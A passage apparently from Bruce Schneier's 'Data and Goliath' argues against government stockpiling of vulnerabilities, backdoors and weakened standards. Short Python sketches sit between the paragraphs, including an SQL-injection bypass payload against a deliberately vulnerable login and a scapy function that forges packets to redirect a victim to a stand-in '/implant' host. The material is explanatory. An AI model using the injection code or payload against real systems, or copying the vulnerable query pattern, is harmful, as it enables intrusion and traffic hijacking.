Data and Goliath

Bruce Schneier

Snowden put it like this in an online Q&A in 2013: “Encryption works. Properly implemented
strong crypto systems are one of the few things that you can rely on. Unfortunately,
endpoint security is so terrifically weak that NSA can frequently find ways around
it.”

But those other methods the NSA can use to get at encrypted data demonstrate exactly
why encryption is so important. By leveraging that mathematical imbalance (encrypting
data is far cheaper than breaking the encryption), cryptography forces an attacker to
pursue these other routes. Instead of passively eavesdropping
on a communications channel and collecting data on everyone, the attacker might have
to break into a specific computer system and grab the plaintext. Those routes around
the encryption require more work, more risk of exposure, and more targeting than bulk
collection of unencrypted data does.

Remember the economics of big data: just as it is easier to save everything than to
figure out what to save, it is easier to spy on everyone than to figure out who deserves
to be spied on. Widespread encryption has the potential to render mass surveillance
ineffective and to force eavesdroppers to choose their targets. This would be an enormous
win for privacy, because attackers don’t have the budget to target everyone.
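A minimal sketch makes the point concrete (it assumes the third-party Python
cryptography package, chosen here only for illustration): an eavesdropper who copies
the ciphertext off the wire learns nothing, while an endpoint holding the key reads
the message trivially. The attacker’s only practical option is to go after the
endpoint.

```
# A minimal sketch using the third-party Python "cryptography" package: bulk
# interception of well-encrypted traffic yields only opaque ciphertext, so the
# attacker must instead compromise an endpoint that holds the key.
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # exists only on the two endpoints
sender = Fernet(key)

ciphertext = sender.encrypt(b"meet at the usual place at noon")

# What a passive eavesdropper on the wire collects: useless without the key.
print(ciphertext)

# Only a party holding the key, i.e. an endpoint, recovers the plaintext.
print(Fernet(key).decrypt(ciphertext))
```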

THE PREVALENCE OF VULNERABILITIES

Vulnerabilities are mistakes. They’re errors in design or implementation—glitches
in the code or hardware—that allow unauthorized intrusion into a system. So, for example,
a cybercriminal might exploit a vulnerability to break into your computer, eavesdrop
on your web connection, and steal the password you use to log in to your bank account.
A government intelligence agency might use a vulnerability to break into the network
of a foreign terrorist organization and disrupt its operations, or to steal a foreign
corporation’s intellectual property. Another government intelligence agency might
take advantage of a vulnerability to eavesdrop on political dissidents, or terrorist
cells, or rival government leaders. And a military might use a vulnerability to launch
a cyberweapon. This is all hacking.
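To make the idea of an exploitable mistake concrete, here is a toy illustration in
Python, a hypothetical login check rather than code from any real product: building a
database query by pasting in user input lets an attacker log in without knowing the
password, and a one-line change closes the hole.

```
import sqlite3

# An in-memory database standing in for a web application's user table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

def login_vulnerable(name, password):
    # The mistake: user input is pasted directly into the SQL statement.
    query = f"SELECT * FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None

def login_fixed(name, password):
    # The fix: a parameterized query keeps data separate from code.
    return conn.execute(
        "SELECT * FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone() is not None

# The attacker never needs the real password.
print(login_vulnerable("alice", "' OR '1'='1"))  # True: authentication bypassed
print(login_fixed("alice", "' OR '1'='1"))       # False: the flaw is patched
```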

When someone discovers a vulnerability, she can use it either for defense or for offense.
Defense means alerting the vendor and getting it patched—and publishing it so the
community can learn from it. Lots of vulnerabilities are discovered by vendors themselves
and patched without any fanfare. Others are discovered by researchers and ethical
hackers.

Offense involves using the vulnerability to attack others. Unpublished vulnerabilities
are called “zero-day” vulnerabilities; they’re very valuable to attackers because
no one is protected against them, and they can be used worldwide with impunity. Eventually
the affected software’s vendor finds out—the timing depends on how widely the vulnerability
is exploited—and issues a patch to close it.

If an offensive military cyber unit or a cyberweapons manufacturer discovers the vulnerability,
it will keep it secret and use it to build a cyberweapon. If used rarely and stealthily,
the vulnerability might remain secret for a long time. If unused, it will remain secret
until someone else discovers it.

Discoverers can sell vulnerabilities. There’s a robust market in zero-days for attack
purposes—both governments and cyberweapons manufacturers that sell to governments
are buyers—and black markets where discoverers can sell to criminals. Some vendors
offer bounties for vulnerabilities to spur defense research, but the rewards are much
lower.

Undiscovered zero-day vulnerabilities are common. Every piece of
commercial software—your smartphone, your computer, the embedded systems that run
nuclear power plants—has hundreds if not thousands of vulnerabilities, most of them
undiscovered. The science and engineering of programming just isn’t good enough to
produce flawless software, and that isn’t going to change anytime soon. The economics
of software development prioritize features and speed to market, not security.

What all this means is that the threat of hacking isn’t going away. For the foreseeable
future, it will always be possible for a sufficiently skilled attacker to find a vulnerability
in a defender’s system. This will be true for militaries building cyberweapons, intelligence
agencies trying to break into systems in order to eavesdrop, and criminals of all
kinds.

MAINTAINING AN INSECURE INTERNET

In Chapter 6, I discussed how the NSA uses both existing and specially created vulnerabilities
to hack into systems. Its actions put surveillance ahead of security, and end up making
us all less secure. Here’s how the NSA and GCHQ think, according to a Guardian article
on some of the Snowden documents: “Classified briefings between the agencies celebrate
their success at ‘defeating network security and privacy. . . .’ ”

Just how do governments go about defeating security and privacy? We know the NSA uses
the following four main practices. Assume that the Russians, Chinese, and various
other countries are using similar methods. And cybercriminals aren’t far behind.

Stockpiling vulnerabilities in commercial software that we use every day, rather than
making sure those security flaws get fixed.
When the NSA discovers (or buys) a vulnerability, it can either alert the vendor
and get a still-secret vulnerability fixed, or it can hold on to it and use it to
eavesdrop on target computer systems. Both tactics support important US policy goals,
but the NSA has to choose which one to pursue in each case.

Right now, the US—both at the NSA and at US Cyber Command—stockpiles zero-day vulnerabilities.
How many it has is unclear. In 2014, the White House tried to clarify the country’s
policy on this in a blog post, but didn’t really explain it. We know that a single
cyberweapon, Stuxnet, used four zero-days. Using up that many for a single cyberattack
implies that the government’s stockpile is in the hundreds.

In congressional testimony, former NSA director Michael Hayden introduced the agency
jargon NOBUS, “nobody but us”—that is, a vulnerability that nobody but us is likely
to find or use. The NSA has a classified process to determine what it should do about
vulnerabilities. The agency claims that it discloses and closes most of the vulnerabilities
it finds, but holds back some—we don’t know how many—that it believes are NOBUSes.

This approach seems to be the appropriate general framework, but it’s impossible to
apply in practice. Many of us in the security field don’t know how to make NOBUS decisions,
and we worry that the government can’t, either.

This stockpiling puts everyone at risk. Unpatched vulnerabilities make us all less
safe, because anyone can independently discover them and use them to attack us. They’re
inherently destabilizing, especially because they are only effective for a limited
time. Even worse, each use runs the risk that others will learn about the vulnerability
and use it for themselves. And they come in families; keeping one secret might mean
that an entire class of vulnerabilities remains undiscovered and unpatched. The US
and other Western countries are highly vulnerable to zero-days, because of our critical
electronic infrastructure, intellectual property, and personal wealth. Countries like
China and Russia are less vulnerable—North Korea much less—so they have considerably
less incentive to get vulnerabilities fixed.

Inserting backdoors into widely used computer hardware and software products.
Backdoors aren’t new. The security industry has long worried about backdoors left
in software by hackers, and has spent considerable effort trying to find and fix them.
But now we know that the US government is deliberately inserting them into hardware
and software products.

One of the NSA documents disclosed by Snowden describes the “SIGINT Enabling Project,”
one tactic of which is to “insert vulnerabilities into commercial encryption systems,
IT systems, networks, and endpoint communications devices used by targets.” We don’t
know much about this project: how much of it is done with the knowledge and consent
of the manufacturers involved, and how much is done surreptitiously by either employees
secretly working for the government or clandestine manipulation of the company’s master
source code files. We also don’t know how well it has succeeded—the documents don’t
give us a lot of details—but
we know it was funded at $250 million per year. We also don’t know which other countries
do the same things to systems designed by companies under their political control.

We know of a few examples. In Chapter 6, I talked about Microsoft weakening Skype
for the NSA. The NSA also pressured Microsoft to put a backdoor in its BitLocker hard
drive encryption software, although the company seems to have resisted. Presumably
there have been other efforts involving other products; I’ve heard about several unsuccessful
attempts privately.

Deliberately created vulnerabilities are very risky, because there is no way to implement
backdoor access to any system that will ensure that only the government can take advantage
of it. Government-mandated access forces companies to make their products and services
less secure for everyone.

For example, between June 2004 and March 2005 someone wiretapped more than 100 cell
phones belonging to members of the Greek government—the prime minister and the ministers
of defense, foreign affairs, and justice—and other prominent Greek citizens. Swedish
telecommunications provider Ericsson built this wiretapping capability into Vodafone
products, but enabled it only for governments that requested it. Greece wasn’t one
of those governments, but some still-unknown party—a rival political group? organized
crime?—figured out how to surreptitiously turn the feature on.

This wasn’t an isolated incident. Something similar occurred in Italy in 2006. In
2010, Chinese hackers exploited an intercept system Google had put into Gmail to comply
with US government surveillance requests. And in 2012, we learned that every phone
switch sold to the Department of Defense had security vulnerabilities in its surveillance
system; we don’t know whether they were inadvertent or deliberately inserted.

The NSA regularly exploits backdoors built into systems by other countries for other
purposes. For example, it used the wiretap capabilities built in to the Bermuda phone
system to secretly intercept all the country’s phone calls. Why does it believe the
same thing won’t be done to us?

Undermining encryption algorithms and standards.
Another objective of the SIGINT Enabling Project is to “influence policies, standards
and specifications for commercial public key technologies.” Again, details are
few, but I assume these efforts are more focused on proprietary standards like cell
phone security than on public standards like encryption algorithms. For example, the
NSA influenced the adoption of an encryption algorithm for GSM phones that it can
easily break. The one public example we know of is the NSA’s insertion of a backdoored
random number generator into a common Internet standard, followed by efforts to get
that generator used more widely. The intent was to subvert the encryption that people
use to protect their Internet communications and web browsing, but it wasn’t very
successful.
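Why a rigged random number generator matters is easy to show. The sketch below is a
deliberately toy construction, not the actual backdoored design (widely reported to be
the Dual_EC_DRBG generator in a NIST standard): if the attacker knows, or can recover,
the generator’s hidden state, every “random” key it produces can be re-derived, and the
encryption built on top of it is worthless.

```
import random   # a non-cryptographic generator standing in for a backdoored one
import secrets  # an OS-backed generator whose state an attacker cannot predict

def weak_keygen(state):
    # With a known or recoverable internal state, as with a trapdoored design,
    # every "random" key the generator produces is reproducible.
    rng = random.Random(state)
    return bytes(rng.getrandbits(8) for _ in range(16))

victim_key = weak_keygen(state=20130905)    # the victim derives a 128-bit key
attacker_key = weak_keygen(state=20130905)  # the attacker re-derives the same key
print(victim_key == attacker_key)           # True: the encryption above it is moot

# A sound alternative: draw key material from the operating system's CSPRNG.
good_key = secrets.token_bytes(16)
```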

Hacking the Internet.
In Chapter 5, I talked about the NSA’s TAO group and its hacking mission. Aside from
directly breaking into computers and networking equipment, the NSA masquerades as
Facebook and LinkedIn (and presumably other websites as well) to infiltrate target
computers and redirect Internet traffic to its own dummy sites for eavesdropping purposes.
The UK’s GCHQ can find your private photos on Facebook, artificially increase traffic
to a website, disrupt video from a website, delete computer accounts, hack online
polls, and much more.

In addition to the extreme distrust that all these tactics engender amongst Internet
users, they require the NSA to ensure that surveillance takes precedence over security.
Instead of improving the security of the Internet for everyone’s benefit, the NSA
is ensuring that the Internet remains insecure for the agency’s own convenience.

This hurts us all, because the NSA isn’t the only actor out there that thrives on
insecurity. Other governments and criminals benefit from the subversion of security.
And a surprising number of the secret surveillance technologies revealed by Snowden
aren’t exclusive to the NSA, or even to other national intelligence organizations.
They’re just better-funded hacker tools. Academics have discussed ways to recreate
much of the NSA’s collection and analysis tools with open-source and commercial systems.

For example, when I was working with the Guardian on the Snowden documents, the one
top-secret program the NSA desperately did not
want us to expose was QUANTUM. This is the NSA’s program for what is called
packet injection—basically, a technology that allows the agency to hack into computers.
Turns out, though, that the NSA was not alone in its use of this technology. The Chinese
government uses packet injection to attack computers. The cyberweapons manufacturer
Hacking Team sells packet injection technology to any government willing to pay for
it. Criminals use it. And there are hacker tools that give the capability to individuals
as well. All of these existed before I wrote about QUANTUM. By using its knowledge
to attack others rather than to build up the Internet’s defenses, the NSA has worked
to ensure that anyone can use packet injection to hack into computers.
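Packet injection itself is not exotic; open-source tools demonstrate the core trick.
The sketch below uses the scapy library, a public research tool rather than any
agency’s system, with made-up addresses and sequence numbers: an on-path observer
forges a response that claims to come from the legitimate server and races the real
one, and whichever answer arrives first wins.

```
# A minimal sketch of packet injection using the open-source scapy library.
# All addresses, ports, and sequence numbers are hypothetical; real use would
# require observing the victim's live TCP state and raw-socket privileges.
from scapy.all import IP, TCP, Raw, send

def inject_response(victim_ip, victim_port, server_ip, seq, ack, payload):
    # Forge a packet that claims to come from the legitimate web server; if it
    # reaches the victim before the real response, the browser accepts it and
    # the genuine reply arriving later is discarded.
    forged = (IP(src=server_ip, dst=victim_ip)
              / TCP(sport=80, dport=victim_port, flags="PA", seq=seq, ack=ack)
              / Raw(load=payload))
    send(forged, verbose=False)

redirect = b"HTTP/1.1 302 Found\r\nLocation: http://203.0.113.9/implant\r\n\r\n"
inject_response("192.0.2.10", 51234, "198.51.100.5", seq=1000, ack=2000,
                payload=redirect)
```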

Even when technologies are developed inside the NSA, they don’t remain exclusive for
long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s
hacker tools. Techniques first developed for the military cyberweapon Stuxnet have
ended up in criminal malware. The same password-cracking software that Elcomsoft sells
to governments was used by hackers to hack celebrity photos from iCloud accounts.
And once-secret techniques to monitor people’s cell phones are now in common use.
